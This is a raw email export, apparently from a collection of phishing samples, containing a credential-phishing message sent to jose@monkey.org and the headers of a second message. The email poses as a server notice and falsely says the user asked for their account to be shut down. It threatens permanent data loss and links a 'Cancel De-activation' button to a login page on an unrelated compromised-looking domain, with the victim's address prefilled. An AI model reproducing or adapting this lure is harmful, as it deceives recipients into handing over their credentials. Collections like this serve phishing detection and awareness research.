X-suretravel-MailScanner-From: info@emailadministrator.com
X-Spam-Status: No
Status: O
X-Status: 
X-Keywords:                  
X-UID: 229

You will not see this in a MIME-aware mail reader.
--===============0310221408==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body



=20=20=20=09=20=20
=20=20=20=20
=20=20=20
=20
   Server Message=20
=20=20

=20
   Dear jose@monkey.org  Our record indicates that you recently made a requ=
est to shutdown your email (jose@monkey.org). And this request will be proc=
essed shortly. If this request was made accidentally and you have no knowle=
dge of it, you are advised to cancel the request now=20

=20=20
=20=20=20
    Cancel De-activation=20
=20=20
=20=20=20
   However, if you do not cancel this request, Your account will be shutdow=
n shortly=20
and all your email data will be lost permanently. Regards.
Email Administrator=20

=20=20
=20=20=20
=20=20=20=20
=20
=20=20=20
   This message is auto-generated from E-mail security server, and replies =
sent to this email can not be delivered.=20
This email is meant for: jose@monkey.org=20
=20=20
=09=20
--=20
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.


--===============0310221408==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><BODY><TABLE width=3D"100%" align=3Dcenter><BR>
<TBODY>
<TR>
<TD width=3D"10%"></TD>
<TD width=3D"70%">
<TABLE style=3D"BORDER-TOP: #a4a4a4 1px solid; BORDER-RIGHT: #a4a4a4 1px so=
lid; BORDER-BOTTOM: #a4a4a4 1px solid; BORDER-LEFT: #a4a4a4 1px solid" cell=
Spacing=3D0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=3D0 width=3D"100%">
<TBODY>
<TR>
<TD bgColor=3D#045fb4 height=3D110><BR>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT color=3D#ffffff size=3D+4 face=3Dcalibri>Server Message </FONT></=
TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8><BR><BR>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D+2 face=3Dcalibri><B>Dear jose@monkey.org</B> </FONT>
<P><FONT size=3D3 face=3Dcalibri>Our record indicates that you recently mad=
e a request to shutdown your email (<B>jose@monkey.org</B>). And this reque=
st will be processed shortly.=20
<P>If this request was made accidentally and you have no knowledge of it, y=
ou are advised to cancel the request now </FONT></P></TD></TR></TBODY></TAB=
LE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D15></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE height=3D60 width=3D"80%" align=3Dcenter bgColor=3D#045fb4>
<TBODY>
<TR>
<TD>
<DIV align=3Dcenter><A style=3D"TEXT-DECORATION: none" href=3D"http://afric=
ansafetravels.com/cache/ttu/827/login/index.php?email=3Djose@monkey.org" ta=
rget=3D_blank><FONT color=3D#ffffff size=3D+2 face=3Dcalibri>Cancel De-acti=
vation </FONT></A></DIV></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D20></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D70>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D3 face=3Dcalibri>However, if you do not cancel this reques=
t, Your account will be shutdown shortly <BR>and all your email data will b=
e lost permanently.=20
<P>Regards.<BR><B>Email Administrator</B> </FONT></P></TD></TR></TBODY></TA=
BLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D10></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE height=3D10 width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD>
<HR align=3Dcenter width=3D"100%">
</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D2 face=3Dcalibri>This message is auto-generated from E-mai=
l security server, and replies sent to this email can not be delivered. <BR=
>This email is meant for: <B><FONT color=3D#045fb4>jose@monkey.org</FONT></=
B> </FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D30></TD></TR></TBODY></TABLE></TD></TR></TBO=
DY></TABLE></TD>
<TD width=3D"20%"></TD></TR></TBODY></TABLE><br />--=20
<br />This message has been scanned for viruses and
<br />dangerous content by
<a href=3D"http://www.mailscanner.info/"><b>MailScanner</b></a>, and is
<br />believed to be clean.
</BODY></HTML>

--===============0310221408==--

From jose@monkey.org Wed May 25 11:49:49 2016 +0000
Return-Path: codewizard@approject.com
Delivered-To: jose@monkey.org
X-FDA: 71553395298.11.rod61_8fc626f6f950a
X-Spam-Summary: 50,0,0,270537793d4be120,d41d8cd98f00b204,codewizard@approject.com,:,RULES_HIT:41:72:327:355:379:455:800:871:967:973:978:983:988:989:1000:1001:1189:1197:1208:1260:1263:1308:1309:1313:1314:1345:1381:1390:1431:1432:1433:1434:1437:1516:1517:1545:1573:1575:1594:1685:1699:1730:1744:1747:1777:1792:1801:1803:2107:2194:2196:2198:2199:2200:2201:2393:2525:2527:2528:2568:2610:2612:2632:2636:2682:2685:2737:2741:2859:2890:2891:2892:2894:2895:2896:2903:2914:2916:2917:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3154:3353:3552:3554:3770:3866:3867:3868:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4093:4242:4321:4365:4605:4700:6248:6261:6354:6506:6650:6669:6678:6747:7208:7266:7281:7398:7774:7809:7903:7909:8516:8518:8550:8568:8599:8603:8957:9025:9060:9074:9080:9121:9130:9177:9388:9908:10030:10049:10346:11233:11473:11658:11914:12043:12438:12555:12729:12737:12740:12776:12812:12963:12973:13018:13019:1
X-HE-Tag: rod61_8fc626f6f950a
X-Filterd-Recvd-Size: 43793
Received: from approject.com (unknown [201.47.0.91])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 25 May 2016 11:49:47 +0000 (UTC)
